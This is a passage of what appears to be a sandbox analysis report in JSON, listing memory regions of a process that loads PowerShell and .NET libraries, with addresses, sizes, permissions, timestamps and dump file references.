"c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1632174080, "timestamp": "00:00:49.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1830682624, "type": "region", "version": 1 }, "end_va": 1831211007, "entry_point": 1830682624, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_911", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1830682624, "timestamp": "00:00:49.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1620180992, "type": "region", "version": 1 }, "end_va": 1629069311, "entry_point": 1620180992, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll", "id": "region_912", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1620180992, "timestamp": "00:00:49.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_913", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:49.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1629093888, "type": "region", "version": 1 }, "end_va": 1632116735, "entry_point": 1629093888, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_914", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1629093888, "timestamp": "00:00:49.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29569023, "entry_point": 29556736, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_916", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 29556736, "timestamp": "00:00:49.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 31326208, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 31326208, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_917", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 31326208, "timestamp": "00:00:49.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_918", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:00:49.498", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000919-addr_0x0000000001c40000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29626367, "entry_point": 0, "filename": null, "id": "region_919", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:00:49.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 29708287, "entry_point": 29687808, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_920", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 29687808, "timestamp": "00:00:49.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 66191360, "type": "region", "version": 1 }, "end_va": 66457599, "entry_point": 66191360, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_921", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 66191360, "timestamp": "00:00:49.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 29786111, "entry_point": 29753344, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_924", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 29753344, "timestamp": "00:00:50.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29818880, "type": "region", "version": 1 }, "end_va": 29822975, "entry_point": 0, "filename": null, "id": "region_925", "name": "pagefile_0x0000000001c70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29818880, "timestamp": "00:00:50.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 66519040, "type": "region", "version": 1 }, "end_va": 66793471, "entry_point": 66519040, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_926", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 66519040, "timestamp": "00:00:50.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1670250496, "type": "region", "version": 1 }, "end_va": 1670889471, "entry_point": 1670250496, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_927", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1670250496, "timestamp": "00:00:50.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1670905856, "type": "region", "version": 1 }, "end_va": 1671450623, "entry_point": 1670905856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll", "id": "region_928", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1670905856, "timestamp": "00:00:50.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739194368, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_929", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1828323328, "type": "region", "version": 1 }, "end_va": 1830637567, "entry_point": 1828323328, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_930", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1828323328, "timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1864761344, "type": "region", "version": 1 }, "end_va": 1865068543, "entry_point": 1864761344, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_931", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1864761344, "timestamp": "00:00:50.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1915158528, "type": "region", "version": 1 }, "end_va": 1915310079, "entry_point": 1915158528, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_932", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1915158528, "timestamp": "00:00:50.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30806015, "entry_point": 0, "filename": null, "id": "region_933", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_934", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 798720, "start_va": 1617625088, "type": "region", "version": 1 }, "end_va": 1618423807, "entry_point": 1617625088, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_935", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1617625088, "timestamp": "00:00:51.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1618477056, "type": "region", "version": 1 }, "end_va": 1620172799, "entry_point": 1618477056, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_936", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 1618477056, "timestamp": "00:00:51.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1912078336, "type": "region", "version": 1 }, "end_va": 1912262655, "entry_point": 1912078336, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll", "id": "region_937", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1912078336, "timestamp": "00:00:51.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000938-addr_0x0000000001d60000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_938", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:52.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 70189056, "type": "region", "version": 1 }, "end_va": 70533119, "entry_point": 70189056, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll", "id": "region_939", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 70189056, "timestamp": "00:00:52.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1130496, "start_va": 1609826304, "type": "region", "version": 1 }, "end_va": 1610956799, "entry_point": 1609826304, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll", "id": "region_940", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 1609826304, "timestamp": "00:00:52.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1064960, "start_va": 1611005952, "type": "region", "version": 1 }, "end_va": 1612070911, "entry_point": 1611005952, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll", "id": "region_941", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1611005952, "timestamp": "00:00:52.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5464064, "start_va": 1612120064, "type": "region", "version": 1 }, "end_va": 1617584127, "entry_point": 1612120064, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll", "id": "region_942", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 1612120064, "timestamp": "00:00:52.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1907818496, "type": "region", "version": 1 }, "end_va": 1907838975, "entry_point": 1907818496, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_943", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 1907818496, "timestamp": "00:00:52.081", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000944-addr_0x0000000001d70000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000945-addr_0x0000000001d90000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32182271, "entry_point": 0, "filename": null, "id": "region_946", "name": "pagefile_0x0000000001ea0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32112640, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000947-addr_0x0000000001ec0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:53.165", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000948-addr_0x0000000001ed0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000949-addr_0x0000000004350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70582272, "type": "region", "version": 1 }, "end_va": 70647807, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x0000000004350000", "norm_filename": null, "region_type": "private_memory", "start_va": 70582272, "timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000950-addr_0x0000000004360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70647808, "type": "region", "version": 1 }, "end_va": 70713343, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x0000000004360000", "norm_filename": null, "region_type": "private_memory", "start_va": 70647808, "timestamp": "00:00:53.166", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000951-addr_0x0000000004370000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70713344, "type": "region", "version": 1 }, "end_va": 70778879, "entry_point": 0, "filename": null, "id": "region_951", "name": "private_0x0000000004370000", "norm_filename": null, "region_type": "private_memory", "start_va": 70713344, "timestamp": "00:00:53.168", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000952-addr_0x0000000004380000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70778880, "type": "region", "version": 1 }, "end_va": 70844415, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x0000000004380000", "norm_filename": null, "region_type": "private_memory", "start_va": 70778880, "timestamp": "00:00:53.168", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000955-addr_0x0000000004390000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 70844416, "type": "region", "version": 1 }, "end_va": 71368703, "entry_point": 0, "filename": null, "id": "region_955", "name": "private_0x0000000004390000", "norm_filename": null, "region_type": "private_memory", "start_va": 70844416, "timestamp": "00:00:53.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000956-addr_0x0000000004410000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 71368704, "type": "region", "version": 1 }, "end_va": 71434239, "entry_point": 0, "filename": null, "id": "region_956", "name": "private_0x0000000004410000", "norm_filename": null, "region_type": "private_memory", "start_va": 71368704, "timestamp": "00:00:53.720", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000965-addr_0x0000000004710000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74514432, "type": "region", "version": 1 }, "end_va": 74579967, "entry_point": 0, "filename": null, "id": "region_965", "name": "private_0x0000000004710000", "norm_filename": null, "region_type": "private_memory", "start_va": 74514432, "timestamp": "00:00:53.904", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000968-addr_0x0000000004730000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74645504, "type": "region", "version": 1 }, "end_va": 74711039, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x0000000004730000", "norm_filename": null, "region_type": "private_memory", "start_va": 74645504, "timestamp": "00:00:53.923", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000969-addr_0x0000000004740000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74711040, "type": "region", "version": 1 }, "end_va": 74776575, "entry_point": 0, "filename": null, "id": "region_969", "name": "private_0x0000000004740000", "norm_filename": null, "region_type": "private_memory", "start_va": 74711040, "timestamp": "00:00:53.924", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000970-addr_0x0000000004750000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74776576, "type": "region", "version": 1 }, "end_va": 74842111, "entry_point": 0, "filename": null, "id": "region_970", "name": "private_0x0000000004750000", "norm_filename": null, "region_type": "private_memory", "start_va": 74776576, "timestamp": "00:00:54.683", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000971-addr_0x0000000004840000-size_0x0000000000990000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 10027008, "start_va": 75759616, "type": "region", "version": 1 }, "end_va": 85786623, "entry_point": 0, "filename": null, "id": "region_971", "name": "private_0x0000000004840000", "norm_filename": null, "region_type": "private_memory", "start_va": 75759616, "timestamp": "00:00:54.684", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000973-addr_0x000000007ff50000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2146762752, "type": "region", "version": 1 }, "end_va": 2146828287, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x000000007ff50000", "norm_filename": null, "region_type": 